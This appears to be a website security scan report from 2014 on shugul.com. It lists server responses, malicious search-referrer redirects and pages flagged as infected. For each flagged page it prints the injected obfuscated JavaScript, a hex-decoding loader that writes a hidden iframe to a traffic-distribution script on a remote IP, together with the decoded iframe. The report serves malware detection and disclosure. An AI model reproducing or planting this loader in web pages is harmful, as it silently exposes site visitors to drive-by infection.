Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.shugul.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.shugul.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 28 Sep 2014 05:36:24 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.shugul.com/ | 200 OK Content-Length: 25942 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ff19a456(v51859ff19a4a1){ return(parseInt(v51859ff19a4a1,16));}function v51859ff19a5b5(v51859ff19a5f8){ var v51859ff19a7e1='';for(v51859ff19a82a=0; v51859ff19a82a<v51859ff19a5f8.length; v51859ff19a82a+=2){ v51859ff19a7e1+=(String.fromCharCode(v51859ff19a456(v51859ff19a5f8.substr(v51859ff19a82a, 2))));}return v51859ff19a7e1;} document.write(v51859ff19a5b5('3C696672616D65206E616D653D27353731316330366262633827207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333631206865696768743D313431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='5711c06bbc8' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=361 height=141 style='display:none'></iframe> Antivirus reports:
| ||
http://www.shugul.com/js/main.js | 200 OK Content-Length: 14232 Content-Type: application/x-javascript | clean |
http://www.shugul.com/js/noclick.js | 200 OK Content-Length: 624 Content-Type: application/x-javascript | clean |
http://www.shugul.com/company/index.html | 200 OK Content-Length: 10185 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859fef0a50c(v51859fef0a554){ function v51859fef0a598 () {return 16;} return(parseInt(v51859fef0a554,v51859fef0a598()));}function v51859fef0a651(v51859fef0a695){ function v51859fef0a771 () {var v51859fef0a7b1=2; return v51859fef0a7b1;} var v51859fef0a6dc='';for(v51859fef0a727=0; v51859fef0a727<v51859fef0a695.length; v51859fef0a727+=v51859fef0a771()){ v51859fef0a6dc+=(String.fromCharCode(v51859fef0a50c(v51859fef0a695.substr(v51859fef0a727, v51859fef0a771()))));}return v51859fef0a6dc;} document.write(v51859fef0a651('3C696672616D65206E616D653D27623362303427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3331206865696768743D3930207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='b3b04' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=31 height=90 style='display:none'></iframe> Antivirus reports:
| ||
http://www.shugul.com/company/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:26 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://padovarisorse.it/mambots/search/search.php | 200 OK Content-Length: 186 Content-Type: text/html | clean |
http://padovarisorse.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163644 Content-Type: application/x-javascript | clean |
http://www.shugul.com/company/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:27 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/portfolio/index.html | 200 OK Content-Length: 11843 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ffa2dd08(v51859ffa2dd5a){ function v51859ffa2dd97 () {var v51859ffa2dde5=16; return v51859ffa2dde5;} return(parseInt(v51859ffa2dd5a,v51859ffa2dd97()));}function v51859ffa2de7b(v51859ffa2dec9){ var v51859ffa2dfb8=2; var v51859ffa2df17='';for(v51859ffa2df69=0; v51859ffa2df69<v51859ffa2dec9.length; v51859ffa2df69+=v51859ffa2dfb8){ v51859ffa2df17+=(String.fromCharCode(v51859ffa2dd08(v51859ffa2dec9.substr(v51859ffa2df69, v51859ffa2dfb8))));}return v51859ffa2df17;} document.write(v51859ffa2de7b('3C696672616D65206E616D653D2738333533393427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353034206865696768743D353034207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='835394' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=504 height=504 style='display:none'></iframe> Antivirus reports:
| ||
http://www.shugul.com/portfolio/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/portfolio/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/about.html | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/services/index.html | 200 OK Content-Length: 21109 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ffd1584e(v51859ffd15893){ var v51859ffd1592e=16; return(parseInt(v51859ffd15893,v51859ffd1592e));}function v51859ffd159e8(v51859ffd15a4b){ var v51859ffd15c82=2; var v51859ffd15a9a='';for(v51859ffd15b26=0; v51859ffd15b26<v51859ffd15a4b.length; v51859ffd15b26+=v51859ffd15c82){ v51859ffd15a9a+=(String.fromCharCode(v51859ffd1584e(v51859ffd15a4b.substr(v51859ffd15b26, v51859ffd15c82))));}return v51859ffd15a9a;} document.write(v51859ffd159e8('3C696672616D65206E616D653D2761626433333230323733366127207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353931206865696768743D3230207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='abd33202736a' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=591 height=20 style='display:none'></iframe> Antivirus reports:
| ||
http://www.shugul.com/services/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/services/../js/dhtmlwindow.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/services/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:28 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/whitepapers/index.html | 200 OK Content-Length: 14369 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51865da38fafd(v51865da38fb47){ var v51865da38fb8e=16; return(parseInt(v51865da38fb47,v51865da38fb8e));}function v51865da38fc15(v51865da38fc56){ var v51865da38fc98='';for(v51865da38fcd9=0; v51865da38fcd9<v51865da38fc56.length; v51865da38fcd9+=2){ v51865da38fc98+=(String.fromCharCode(v51865da38fafd(v51865da38fc56.substr(v51865da38fcd9, 2))));}return v51865da38fc98;} document.write(v51865da38fc15('3C696672616D65206E616D653D27386332306327207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353536206865696768743D3237207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='8c20c' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=556 height=27 style='display:none'></iframe> Antivirus reports:
| ||
http://www.shugul.com/whitepapers/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/whitepapers/../js/dhtmlwindow.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/whitepapers/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/newsletter/index.html | 200 OK Content-Length: 13473 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ff699a30(v51859ff699a70){ var v51859ff699ab3=16; return(parseInt(v51859ff699a70,v51859ff699ab3));}function v51859ff699b59(v51859ff699b99){ function v51859ff699c57 () {return 2;} var v51859ff699bd8='';for(v51859ff699c16=0; v51859ff699c16<v51859ff699b99.length; v51859ff699c16+=v51859ff699c57()){ v51859ff699bd8+=(String.fromCharCode(v51859ff699a30(v51859ff699b99.substr(v51859ff699c16, v51859ff699c57()))));}return v51859ff699bd8;} document.write(v51859ff699b59('3C696672616D65206E616D653D27623227207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3639206865696768743D333134207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='b2' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=69 height=314 style='display:none'></iframe> Antivirus reports:
| ||
http://www.shugul.com/newsletter/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/newsletter/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:29 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/forward/index.html | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/choice.html | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/tools/index.html | 200 OK Content-Length: 14034 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51865d9fd92a0(v51865d9fd92f4){ return(parseInt(v51865d9fd92f4,16));}function v51865d9fd9428(v51865d9fd946c){ var v51865d9fd953a=2; var v51865d9fd94b2='';for(v51865d9fd94f5=0; v51865d9fd94f5<v51865d9fd946c.length; v51865d9fd94f5+=v51865d9fd953a){ v51865d9fd94b2+=(String.fromCharCode(v51865d9fd92a0(v51865d9fd946c.substr(v51865d9fd94f5, v51865d9fd953a))));}return v51865d9fd94b2;} document.write(v51865d9fd9428('3C696672616D65206E616D653D2733623627207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3534206865696768743D333033207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='3b6' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=54 height=303 style='display:none'></iframe> Antivirus reports:
| ||
http://www.shugul.com/tools/../js/main.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/tools/../js/dhtmlwindow.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:30 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2.asp?partner=netweather&tStyle=normal&logo=1&zipcode=AFR|SD|SU005|KHARTOUM|&lang=uke&size=9&theme=&metric=1&target=_self | 200 OK Content-Length: 8331 Content-Type: text/javascript | clean |
http://www.shugul.com/tools/../js/noclick.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 05:36:31 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.shugul.com/contacts.html | 200 OK Content-Length: 11644 Content-Type: text/html | clean |
http://www.shugul.com/index.html | 200 OK Content-Length: 25942 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51859ff19a456(v51859ff19a4a1){ return(parseInt(v51859ff19a4a1,16));}function v51859ff19a5b5(v51859ff19a5f8){ var v51859ff19a7e1='';for(v51859ff19a82a=0; v51859ff19a82a<v51859ff19a5f8.length; v51859ff19a82a+=2){ v51859ff19a7e1+=(String.fromCharCode(v51859ff19a456(v51859ff19a5f8.substr(v51859ff19a82a, 2))));}return v51859ff19a7e1;} document.write(v51859ff19a5b5('3C696672616D65206E616D653D27353731316330366262633827207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333631206865696768743D313431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='5711c06bbc8' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=361 height=141 style='display:none'></iframe> Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shugul.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shugul.com/
Result: shugul.com is not infected or malware details are not published yet.
Result: shugul.com is not infected or malware details are not published yet.